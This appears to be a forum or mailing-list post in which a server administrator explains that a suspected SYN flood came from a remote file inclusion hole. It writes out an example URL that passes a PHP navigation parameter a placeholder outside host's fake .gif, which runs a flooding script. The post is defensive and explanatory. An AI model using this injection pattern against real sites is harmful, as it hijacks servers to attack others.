I started a thread last week regarding trying to block some IPs that I
thought were sending a syn flood on my server. The suggested action (IP
Tables) didn't seem to help.
It turns out the problem was a little different than I expected and I wanted
to let everyone know exactly what was happening.
What some was doing was running the following URLs on one of the server's
sites:
http://www.domainname.com/index.php?active=http://www.someotherdomain.com/filename.gif
But filename.gif is not a gif, it is a text file with a script that sends a
synflood to some other server.
The ?sctive= part of the URL is the way the site was set up for navigation.
Although I design in PHP a lot, I haven't run across this particular
navigation set up. But in any event, it obviously opens the site to the
kind of exploiting behavior it was getting. I'm assuming some design
software set the navigation up this way and that once this is taken out
there shouldn't be a problem.
Has anyone else run across this?